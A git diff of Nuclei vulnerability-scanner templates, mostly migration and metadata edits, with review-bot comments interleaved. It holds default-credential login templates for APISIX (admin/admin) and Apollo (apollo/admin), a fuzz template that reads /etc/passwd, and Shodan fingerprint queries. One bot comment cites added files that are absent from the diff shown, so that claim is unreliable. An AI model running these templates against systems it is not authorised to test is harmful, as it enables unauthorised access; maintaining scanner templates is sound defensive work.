+++ b/nuclei-templates/Other/apigee-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://cloud.google.com/apigee?hl=en metadata: - verified: true max-request: 1 shodan-query: http.favicon.hash:"-839356603" + verified: true tags: panel,apigee,login http: 
@@ -32,4 +32,4 @@ http: group: 1 regex: - 'Version:?\s+([0-9.]+)' -# digest: 490a004630440220688a442d2442a84abe5045f8ed111f8ba36419f7f7ef8a557f7aac684b7a387702204f2fa7abd4fe51946fb0814b71b1efd662356095dfa93b3102bf6c679ef64ddc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022024de85a2064b59024b17d948274dc76df5c6bd4686e677536a0d2fecf1a4caeb022100de0d18e50fc7b9dd92022639756256b0c98e3a3db454035d1565be64993edccd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apiman-panel-464.yaml b/nuclei-templates/Other/apiman-panel-462.yaml similarity index 100% rename from nuclei-templates/Other/apiman-panel-464.yaml rename to nuclei-templates/Other/apiman-panel-462.yaml diff --git a/nuclei-templates/Other/apisix-default-login-491.yaml b/nuclei-templates/Other/apisix-default-login-491.yaml deleted file mode 100644 index e3e9553a9a..0000000000 --- a/nuclei-templates/Other/apisix-default-login-491.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: apisix-default-login - -info: - name: Apache Apisix Default Login - author: pdteam - severity: critical - tags: apisix,apache,default-login - metadata: - shodan-query: title:"Apache APISIX Dashboard" - fofa-query: title="Apache APISIX Dashboard" - product: https://apisix.apache.org - -requests: - - raw: - - | - POST /apisix/admin/user/login HTTP/1.1 - Host: {{Hostname}} - Accept: application/json - Authorization: - Content-Type: application/json;charset=UTF-8 - - {"username":"{{user}}","password":"{{pass}}"} - - attack: pitchfork - payloads: - user: - - admin - pass: - - admin - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '"data"' - - '"token"' - - '"code":0' - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/apisix-default-login.yaml b/nuclei-templates/Other/apisix-default-login.yaml new file mode 100644 index 0000000000..c16b0c60b1 --- /dev/null 
+++ b/nuclei-templates/Other/apisix-default-login.yaml @@ -0,0 +1,37 @@ +id: apisix-default-login +info: + name: Apache Apisix Default Login + author: pdteam + severity: critical + tags: apisix,apache,default-login + metadata: + shodan-query: title:"Apache APISIX Dashboard" + fofa-query: title="Apache APISIX Dashboard" + product: https://apisix.apache.org +requests: + - raw: + - | + POST /apisix/admin/user/login HTTP/1.1 + Host: {{Hostname}} + Accept: application/json + Authorization: + Content-Type: application/json;charset=UTF-8 + + {"username":"{{user}}","password":"{{pass}}"} + attack: pitchfork + payloads: + user: + - admin + pass: + - admin + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - '"data"' + - '"token"' + - '"code":0' + condition: and diff --git a/nuclei-templates/Other/apollo-default-login-521.yaml b/nuclei-templates/Other/apollo-default-login-521.yaml new file mode 100644 index 0000000000..03709bd616 --- /dev/null +++ b/nuclei-templates/Other/apollo-default-login-521.yaml 
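Review bot: The new apisix-default-login.yaml keeps the deprecated `requests:` key and has neither `metadata: max-request: 1` nor a `classification` block, while the other default-login template added in this commit (apollo-default-login-521.yaml) uses `http:` and carries both; aligning it avoids mixed syntax across the set. The raw request also sends an `Authorization:` header with an empty value, which looks like a leftover — either drop the line or add a comment explaining why the dashboard needs an empty header. The matcher requiring `"code":0` together with `"token"` under the existing `matchers-condition: and` is reasonably specific and needs no change.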
@@ -0,0 +1,55 @@ +id: apollo-default-login + +info: + name: Apollo Default Login + author: PaperPen + severity: high + description: An Apollo default login was discovered. + reference: + - https://github.com/apolloconfig/apollo + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + max-request: 2 + shodan-query: http.favicon.hash:11794165 + tags: apollo,default-login + +http: + - raw: + - | + POST /signin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Origin: {{BaseURL}} + Referer: {{BaseURL}}/signin? + + username={{user}}&password={{pass}}&login-submit=Login + - | + GET /user HTTP/1.1 + Host: {{Hostname}} + + attack: pitchfork + payloads: + user: + - apollo + pass: + - admin + + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - '"userId":' + - '"email":' + condition: or + + - type: dsl + dsl: + - "status_code_1 == 302 && status_code_2 == 200" + - "contains(tolower(header_2), 'application/json')" + condition: and + +# digest: 4a0a004730450220546faaa98906288873457aaf445639368f32ddc0a459ae0362b9c87333a0832d022100a718e9fdccaa633152c35bd8f59d89e60a8a24f359521d6c6b0232fe8a07e196:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/apollo-default-login.yaml b/nuclei-templates/Other/apollo-default-login.yaml deleted file mode 100644 index c9e119d097..0000000000 --- a/nuclei-templates/Other/apollo-default-login.yaml +++ /dev/null 
@@ -1,57 +0,0 @@ -id: apollo-default-login - -info: - name: Apollo Default Login - author: PaperPen - severity: high - description: An Apollo default login was discovered. - reference: - - https://github.com/apolloconfig/apollo - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - shodan-query: http.favicon.hash:11794165 - tags: apollo,default-login - -requests: - - raw: - - | - POST /signin HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Origin: {{BaseURL}} - Referer: {{BaseURL}}/signin? - - username={{user}}&password={{pass}}&login-submit=Login - - - | - GET /user HTTP/1.1 - Host: {{Hostname}} - - attack: pitchfork - payloads: - user: - - apollo - pass: - - admin - - cookie-reuse: true - req-condition: true - matchers-condition: and - matchers: - - type: word - part: body_2 - words: - - '"userId":' - - '"email":' - condition: or - - - type: dsl - dsl: - - "status_code_1 == 302 && status_code_2 == 200" - - "contains(tolower(all_headers_2), 'application/json')" - condition: and - -# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/apollo-server-detect-522.yaml b/nuclei-templates/Other/apollo-server-detect-522.yaml new file mode 100644 index 0000000000..18fc8f973f --- /dev/null +++ b/nuclei-templates/Other/apollo-server-detect-522.yaml 
@@ -0,0 +1,37 @@ +id: apollo-server-detect + +info: + name: Apollo Server GraphQL introspection detection + author: idealphase + severity: info + description: Apollo Server is a community-maintained open-source GraphQL server. It works with many Node.js HTTP server frameworks, or can run on its own with a built-in Express server. Apollo Server works with any GraphQL schema built with GraphQL.js--or define a schema's type definitions using schema definition language (SDL). + reference: + - https://github.com/apollographql/apollo-server + tags: apollo,detect,graphql + +requests: + - method: POST + path: + - "{{BaseURL}}/graphql" + + headers: + Content-Type: application/json + + body: | + {"query":"query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"} + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "Content-Type: application/json" + + - type: word + part: body + words: + - "GraphQL introspection is not allowed by Apollo Server" + + - type: status + status: + - 400 diff --git a/nuclei-templates/Other/apollo-server-detect.yaml b/nuclei-templates/Other/apollo-server-detect.yaml deleted file mode 100644 index 8c2dee07bc..0000000000 --- a/nuclei-templates/Other/apollo-server-detect.yaml +++ /dev/null 
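Review bot: Despite its name, apollo-server-detect-522.yaml only matches the hardened case — status `400` and the body text `GraphQL introspection is not allowed by Apollo Server` — so an Apollo instance with introspection left enabled, the configuration a security review actually wants flagged, answers 200 with schema data and is silently missed. Either rename the template and say in `description` that it detects servers with introspection disabled, or add a second word matcher for the introspection response under an `or` condition so both states are reported as distinct findings. The header matcher word `Content-Type: application/json` is case-sensitive; HTTP/2 and some proxies lowercase header names, so set `case-insensitive: true` on that matcher.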
@@ -1,36 +0,0 @@ -id: apollo-server-detect - -info: - name: Apollo Server GraphQL introspection detection - author: idealphase - severity: info - description: Apollo Server is a community-maintained open-source GraphQL server. It works with many Node.js HTTP server frameworks, or can run on its own with a built-in Express server. Apollo Server works with any GraphQL schema built with GraphQL.js--or define a schema's type definitions using schema definition language (SDL). - reference: https://github.com/apollographql/apollo-server - tags: apollo,detect,graphql - -requests: - - method: POST - path: - - "{{BaseURL}}/graphql" - - headers: - Content-Type: application/json - - body: | - {"query":"query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"} - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "Content-Type: application/json" - - - type: word - part: body - words: - - "GraphQL introspection is not allowed by Apollo Server" - - - type: status - status: - - 400 diff --git a/nuclei-templates/Other/appcms-detect.yaml b/nuclei-templates/Other/appcms-detect.yaml index bc2b1aa95a..0e8a6fb38d 100644 --- a/nuclei-templates/Other/appcms-detect.yaml +++ b/nuclei-templates/Other/appcms-detect.yaml 
@@ -4,9 +4,12 @@ info: name: AppCms Detect author: princechaddha severity: info + metadata: + max-request: 1 + shodan-query: http.html:"Powerd by AppCMS" tags: tech,appcms -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -28,3 +31,5 @@ requests: group: 1 regex: - '' + +# digest: 4a0a004730450220048cb3b4991d02e731d9fce6eea113c4b84e5639f85a867281f1ae48f106f9f8022100e3e48abd4c96c7d584806ba355fb6ac163786e36d4a4768b56c68908ee46e44d:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/apple_app_site.yaml b/nuclei-templates/Other/apple-app-site-association-524.yaml similarity index 100% rename from nuclei-templates/Other/apple_app_site.yaml rename to nuclei-templates/Other/apple-app-site-association-524.yaml diff --git a/nuclei-templates/Other/apple-httpserver.yaml b/nuclei-templates/Other/apple-httpserver.yaml index eb84ca9832..0174b6725c 100644 --- a/nuclei-templates/Other/apple-httpserver.yaml +++ b/nuclei-templates/Other/apple-httpserver.yaml @@ -6,11 +6,12 @@ info: severity: info metadata: verified: true - fofa-query: app="Apple-HttpServer" + max-request: 1 shodan-query: "AppleHttpServer" + fofa-query: app="Apple-HttpServer" tags: tech,apple,httpserver -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -24,3 +25,5 @@ requests: - "AppleHttpServer" - "X-Apple-Request-UUID" condition: or + +# digest: 4a0a00473045022064d6a126bff997cdd86144d8b4617d888a0f352dd6568bfffe849bf75446ae83022100c035796ca18f693c66ae94d4da48c3d127170aa55094eb1e4100a7f438537d9c:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/Application_level_dos.yaml b/nuclei-templates/Other/application_level_dos.yaml similarity index 100% rename from nuclei-templates/Other/Application_level_dos.yaml rename to nuclei-templates/Other/application_level_dos.yaml diff --git a/nuclei-templates/Other/application_security_gateway.yaml b/nuclei-templates/Other/application_security_gateway.yaml new file mode 100644 index 0000000000..e813792d00 --- /dev/null 
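Review bot: The extractor at the end of appcms-detect.yaml shows `regex:` with an empty string `''` in this diff; if that is the real file content the pattern matches everywhere and `group: 1` captures nothing, and if the original pattern contained angle brackets it may have been stripped on the way into this page — please check the file on disk. The hunk itself only switches `requests:` to `http:` and adds `max-request` and `shodan-query`; the query string `http.html:"Powerd by AppCMS"` looks like a typo but may be the literal footer text, so confirm against a live page before correcting it.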
+++ b/nuclei-templates/Other/application_security_gateway.yaml @@ -0,0 +1,20 @@ +id: application_security_gateway +info: + name: application_security_gateway + author: cn-kali-team + tags: detect,tech,application_security_gateway + severity: info + metadata: + fofa-query: + - ns-icg + product: application_security_gateway + vendor: netentsec + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - ns-icg diff --git a/nuclei-templates/Other/appsettings-file-disclosure.yaml b/nuclei-templates/Other/appsettings-file-disclosure.yaml index f6d0a72737..ac3d7357a5 100644 --- a/nuclei-templates/Other/appsettings-file-disclosure.yaml +++ b/nuclei-templates/Other/appsettings-file-disclosure.yaml @@ -10,15 +10,17 @@ info: - https://twitter.com/hacker_/status/1518003548855930882?s=20&t=BVauK0yUjVl5yL7rwy0Eag metadata: verified: true + max-request: 2 tags: exposure,files -requests: +http: - method: GET path: - "{{BaseURL}}/appsettings.json" - "{{BaseURL}}/appsettings.Production.json" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -33,3 +35,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a0047304502200ab0a99b7f2a8e0bd193d05bfb9729dd541336eed01eb74041387c3d11c5cd1b022100ceeb9d3c0ca44313f67af0375112f915400c298b3b4e1942f3cce2fef6954809:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/appsmith-web-login.yaml b/nuclei-templates/Other/appsmith-web-login.yaml index 72f869b251..b28180205b 100644 --- a/nuclei-templates/Other/appsmith-web-login.yaml +++ b/nuclei-templates/Other/appsmith-web-login.yaml 
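Review bot: The matcher in application_security_gateway.yaml is a single word, `ns-icg`, with no `part`, no status check and no `matchers-condition`, so any page that mentions the string anywhere (a vendor list, a blog post, a header value) is reported as the product. Adding `part: body`, `case-insensitive: true`, and a `- type: status` matcher for `200` under `matchers-condition: and` tightens it. Style-wise the `http:` list item sits at column 0 (`- method: GET`) while every other template in this commit indents it two spaces, `name` repeats the id instead of a readable title, and `metadata` lacks `max-request: 1`.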
@@ -9,14 +9,17 @@ info: - https://www.appsmith.com classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 + cpe: cpe:2.3:a:appsmith:appsmith:*:*:*:*:*:*:*:* metadata: - verified: true + max-request: 1 + product: appsmith shodan-query: http.title:"appsmith" + vendor: appsmith + verified: true tags: panel,appsmith -requests: +http: - method: GET path: - "{{BaseURL}}/user/login" @@ -31,5 +34,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/31 +# digest: 4a0a00473045022100d7b37c5f11fd7dd4e640706ad39c91ce1f95968e05549a1d3f23c41435625d62022067a75ce8709378d433fe824633e2fbc0596e3d3648681b856cd89fcbadb7dc2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/appspace-panel.yaml b/nuclei-templates/Other/appspace-panel.yaml index 52a060ef87..f571068619 100644 --- a/nuclei-templates/Other/appspace-panel.yaml +++ b/nuclei-templates/Other/appspace-panel.yaml @@ -7,12 +7,14 @@ info: description: Appspace is the workplace experience platform for your whole team that lets you manage it all – from employee communications to your physical office spaces. reference: - https://www.appspace.com/ + classification: + cpe: cpe:2.3:a:appspace:appspace:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 3 - vendor: appspace product: appspace shodan-query: title:"Appspace" + vendor: appspace + verified: true tags: appspace,panel,detect http: @@ -42,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206a890af8b1229f17e88ea14f189ad370fbc1fd991e0ab1a8c86fdfc790d6f808022100e9c8a62f28479a1f96d14f5f755f3f5060242a11640c928c3b6ff34aa8ea404d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d0756e6e209352ea0ac90827c785e76a43448ce465c4a17674774cc59afecdff022100c126685413b98a7d183497b337ff43ddc5a39fa1bb9ea5b12f356761517fe22b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/Other/appsuite-panel.yaml b/nuclei-templates/Other/appsuite-panel.yaml index 17b5912610..b47bd4d72d 100644 --- a/nuclei-templates/Other/appsuite-panel.yaml +++ b/nuclei-templates/Other/appsuite-panel.yaml @@ -4,13 +4,15 @@ info: name: Appsuite Login Panel - Detect author: DhiyaneshDK severity: info + classification: + cpe: cpe:2.3:a:open-xchange:open-xchange_appsuite:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 1 - vendor: open-xchange product: open-xchange_appsuite shodan-query: html:"Appsuite" - tags: panel,appsuite,detect + vendor: open-xchange + verified: true + tags: panel,appsuite,detect,open-xchange http: - method: GET @@ -32,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d3833a5bbb36893c9570c94dd2482d39db34ca2ea9414064f63c601af519ac8c02206080c31920d7915b8ab9c73b7b5f33c0ea0cb7d4390bec36c3ee9c569d188670:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220357235264a8080fbb79afab06fc6d88dfbf974dfc4e18971f90ba1f8a3a81e6e02203cf71150238153cc7029218157a44a4a7717a9b4b9cba32f4b45db904cfbe5d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/appveyor-configuration-file.yaml b/nuclei-templates/Other/appveyor-configuration-file.yaml index c14556da9f..699406e852 100644 --- a/nuclei-templates/Other/appveyor-configuration-file.yaml +++ b/nuclei-templates/Other/appveyor-configuration-file.yaml 
@@ -1,21 +1,28 @@ id: appveyor-configuration-file info: - name: AppVeyor Configuration Exposure + name: AppVeyor Configuration Page - Detect author: DhiyaneshDk severity: medium + description: AppVeyor configuration page was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 metadata: verified: true + max-request: 2 shodan-query: html:"appveyor.yml" tags: config,exposure,devops -requests: +http: - method: GET path: - "{{BaseURL}}/.appveyor.yml" - "{{BaseURL}}/appveyor.yml" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -27,3 +34,5 @@ requests: - type: status status: - 200 + +# digest: 4b0a00483046022100eeb8e7ad4f7cb96699c4c80afb972876c0c057ef2a9bef2aafd0b908500bb7d9022100c7bd02f544d2b60bf70bf67049efc78f423a35d25550d713fad8198b851a24d4:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/appwrite-panel.yaml b/nuclei-templates/Other/appwrite-panel.yaml index b956b5ae78..4329c6b34e 100644 --- a/nuclei-templates/Other/appwrite-panel.yaml +++ b/nuclei-templates/Other/appwrite-panel.yaml @@ -7,14 +7,14 @@ info: description: Appwrite login panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:appwrite:appwrite:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 2 - vendor: appwrite product: appwrite shodan-query: http.favicon.hash:-633108100 + vendor: appwrite + verified: true tags: panel,appwrite,detect http: 
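Review bot: The new `description` in appveyor-configuration-file.yaml, `AppVeyor configuration page was detected.`, does not say why the exposure matters, and "page" is odd for a YAML file fetched at `/.appveyor.yml` and `/appveyor.yml`. A sentence such as `An exposed appveyor.yml reveals build steps, environment variable names and any encrypted-secret blocks, which profile the CI pipeline.` would justify the `medium` severity and the CWE-200 classification added in this hunk. `max-request: 2` is consistent with the two paths and `stop-at-first-match: true`.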
@@ -28,4 +28,4 @@ http: - type: dsl dsl: - "status_code==200 && (\"-633108100\" == mmh3(base64_py(body)))" -# digest: 4b0a00483046022100f93ac7c4f1b5ca97c57d959b47531ed78b307e7a9c0f64ff388a3c4bfa9d2c4b022100b39a981b65653ead42764d853ab3a29e71d59b9d7657ebd1f526b6480ed5bbd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009f999f1d004f9ce9dc9aa7216e4b888b0638238feb67a00e5df42e973b6151590220347658bd3f22464e6f9c94f8121069d9aaeb9294ee6fe7407fb4e9eda4971527:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/aptus-detect.yaml b/nuclei-templates/Other/aptus-detect.yaml index 2b2f0ef0c3..986821c1bb 100644 --- a/nuclei-templates/Other/aptus-detect.yaml +++ b/nuclei-templates/Other/aptus-detect.yaml @@ -1,5 +1,4 @@ id: aptus-detect - info: name: Aptus Login Panel author: princechaddha @@ -7,19 +6,16 @@ info: metadata: shodan-query: http.title:"Aptus Login" tags: panel,aptus - requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: word part: body words: - "Aptus Login" - - type: status status: - 200 diff --git a/nuclei-templates/Other/aptus-panel.yaml b/nuclei-templates/Other/aptus-panel.yaml index 7482a44bfc..8e2616bac6 100644 --- a/nuclei-templates/Other/aptus-panel.yaml +++ b/nuclei-templates/Other/aptus-panel.yaml @@ -7,13 +7,13 @@ info: description: Aptus login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: + max-request: 1 shodan-query: http.title:"Aptus Login" tags: panel,aptus -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -28,5 +28,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/31 +# digest: 490a004630440220640c761126337fc2830e60088a517d2dfb0f5f6713df24554e6b5d2a67e1820a02201dd18f81fff0bd007f61bbfa6cfeb2d714cd2769ac3e5a2e2c2ed5ca7a47d705:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/Other/aqua-enterprise-detect.yaml b/nuclei-templates/Other/aqua-enterprise-detect.yaml index 74c4c83b7c..b50a235804 100644 --- a/nuclei-templates/Other/aqua-enterprise-detect.yaml +++ b/nuclei-templates/Other/aqua-enterprise-detect.yaml @@ -7,10 +7,11 @@ info: reference: https://www.aquasec.com/ metadata: verified: true + max-request: 1 shodan-query: http.favicon.hash:-1261322577 tags: tech,aqua -requests: +http: - method: GET path: - "{{BaseURL}}/api" @@ -34,3 +35,5 @@ requests: group: 1 regex: - '{"version":"([0-9.]+)",' + +# digest: 4b0a00483046022100a8bafcdb9b81a1529340cc59475de5aea1d084f10b9cd4cd0ff24b5b35fcefa8022100cfb69494c1b15bb374ea8b5cb639f6c17973604da3271ba51fbfef70329801fd:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/aqua-enterprise-panel.yaml b/nuclei-templates/Other/aqua-enterprise-panel.yaml index de9473cc19..45ed002380 100644 --- a/nuclei-templates/Other/aqua-enterprise-panel.yaml +++ b/nuclei-templates/Other/aqua-enterprise-panel.yaml @@ -10,15 +10,15 @@ info: - https://www.aquasec.com/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - verified: true - shodan-query: http.title:"Aqua Enterprise" || http.title:"Aqua Cloud Native Security Platform" google-query: intitle:"Aqua Cloud Native Security Platform" + max-request: 1 + shodan-query: http.title:"Aqua Enterprise" || http.title:"Aqua Cloud Native Security Platform" + verified: true tags: panel,aqua,aquasec -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -35,5 +35,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/31 +# digest: 490a004630440220593d2e3c0053ffb4805eb449e8128d62c48270b1f22b228bd3b55f66c19b5b3c0220671474cb61608750a9c4182d05be825663967cea331656a7048979a5a99a61c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/Other/arangodb-web-Interface.yaml b/nuclei-templates/Other/arangodb-web-Interface.yaml index d6742d9673..2b2ff1ee32 100644 --- a/nuclei-templates/Other/arangodb-web-Interface.yaml +++ b/nuclei-templates/Other/arangodb-web-Interface.yaml @@ -8,12 +8,14 @@ info: ArangoDB Web Interface was detected. reference: - https://www.arangodb.com/docs/stable/ + classification: + cpe: cpe:2.3:a:arangodb:arangodb:*:*:*:*:*:*:*:* metadata: - verified: "true" max-request: 1 - vendor: arangodb product: arangodb shodan-query: http.title:"ArangoDB Web Interface" + vendor: arangodb + verified: "true" tags: panel,arangodb,login http: @@ -30,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eb08b8231d49bb6456e8fb52da40302af235e46637edce8411b2067412cb5a0d022069c4f9c7a3d47f53943b9bb7a31c5114d5e4e9a41dc2f3e62c1194310311df90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b5e79f701c8ae32d77121cec5ed1e9fabae11c849f798f1618fdfb5fd5a6cbc0022100a47a6d129ae459f8744c509ad9ab8a9223417a903ab0781b9daf4114ca2edb09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/arbitrary-file-read.yaml b/nuclei-templates/Other/arbitrary-file-read.yaml index 34260c7053..e1fb95913b 100644 --- a/nuclei-templates/Other/arbitrary-file-read.yaml +++ b/nuclei-templates/Other/arbitrary-file-read.yaml @@ -5,7 +5,6 @@ info: author: Sushant Kamble (https://in.linkedin.com/in/sushantkamble) severity: high description: Searches for /etc/passwd on passed URLs. - tags: fuzz,lfi requests: - method: GET diff --git a/nuclei-templates/Other/arcgis-panel-530.yaml b/nuclei-templates/Other/arcgis-panel-531.yaml similarity index 100% rename from nuclei-templates/Other/arcgis-panel-530.yaml rename to nuclei-templates/Other/arcgis-panel-531.yaml 
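Review bot: The metadata reorder in arangodb-web-Interface.yaml re-adds `verified: "true"` as a quoted string, while the other templates touched in this commit (appsuite-panel, appwrite-panel, arcgis-services) carry the bare boolean `verified: true`. A YAML loader reads the quoted form as a string, so any tooling that filters templates on the boolean will treat this one differently. Since the line is being rewritten anyway, `verified: true` would make it consistent. The `http:` block that follows the `tags` line starts outside this hunk.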
diff --git a/nuclei-templates/Other/arcgis-rest-api-532.yaml b/nuclei-templates/Other/arcgis-rest-api-532.yaml new file mode 100644 index 0000000000..897c70d812 --- /dev/null +++ b/nuclei-templates/Other/arcgis-rest-api-532.yaml @@ -0,0 +1,29 @@ +id: arcgis-rest-api + +info: + name: ArcGIS Exposed Docs + author: Podalirius + severity: info + description: ArcGIS documents were discovered. + reference: + - https://enterprise.arcgis.com/en/ + classification: + cwe-id: CWE-200 + tags: api,arcgis,cms + +requests: + - method: GET + path: + - '{{BaseURL}}/server/sdk/rest/index.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'ArcGIS REST API' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/arcgis-rest-api-533.yaml b/nuclei-templates/Other/arcgis-rest-api-533.yaml deleted file mode 100644 index b60cfd2026..0000000000 --- a/nuclei-templates/Other/arcgis-rest-api-533.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: arcgis-rest-api - -info: - name: ArcGIS Exposed Docs - author: Podalirius - severity: info - description: ArcGIS documents were discovered. - tags: api,arcgis,cms - reference: - - https://enterprise.arcgis.com/en/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - '{{BaseURL}}/server/sdk/rest/index.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'ArcGIS REST API' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/arcgis-services.yaml b/nuclei-templates/Other/arcgis-services.yaml index 0ebeba5ee8..df59cea6e3 100644 --- a/nuclei-templates/Other/arcgis-services.yaml +++ b/nuclei-templates/Other/arcgis-services.yaml 
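Review bot: The new arcgis-rest-api-532.yaml uses the legacy top-level `requests:` key while the other templates in this patch are being migrated to `http:` (aptus-panel, aqua-enterprise-detect, arris-modem-detect), and it ends with the stale `# Enhanced by mp on 2022/03/20` comment instead of the `# digest:` line the migrated templates carry. The same applies to the other files added in this chunk: argocd-login-534.yaml, artifactory_deploy.yaml, aspose-file-download-561.yaml, aspose-ie-file-download-565.yaml and aspose-pdf-file-download-568.yaml. Changing `requests:` to `http:` is a one-word edit in each; the three aspose templates would additionally benefit from a `classification:` block with `cwe-id: CWE-22`, since they report a path-traversal read and none of them has any classification. The deleted arcgis-rest-api-533.yaml carried the same `id: arcgis-rest-api`, so this pair is effectively a rename and the id collision is resolved, but it is worth confirming no third copy of the id exists elsewhere in the repository.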
@@ -7,13 +7,15 @@ info: description: Check for the existence of the "/arcgis/rest/services" path on an ArcGIS server. reference: - https://enterprise.arcgis.com/en/ + classification: + cpe: cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 1 - vendor: esri product: arcgis_server shodan-query: title:"ArcGIS" - tags: panel,arcgis,rest,api,detect + vendor: esri + verified: true + tags: panel,arcgis,rest,api,detect,esri http: - method: GET @@ -38,4 +40,4 @@ http: group: 1 regex: - 'Current Version:\s*<\/b>\s*([0-9.]+)' -# digest: 4b0a00483046022100a098cf3b3472bbc94ecc5e01a30e81321252b1e2aaa9dfd3fa2dbe15f76ac46002210087775392928656c8ed94592b4188564aa740aac93cedf497be32b3995c610e71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dff450061a964e5a154028977c3f879fa27f91712b0b4f7e8295b07199618444022100a508425811e5aee07eab739f769239323b52761d47bdcb35bbe0a980dc972661:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 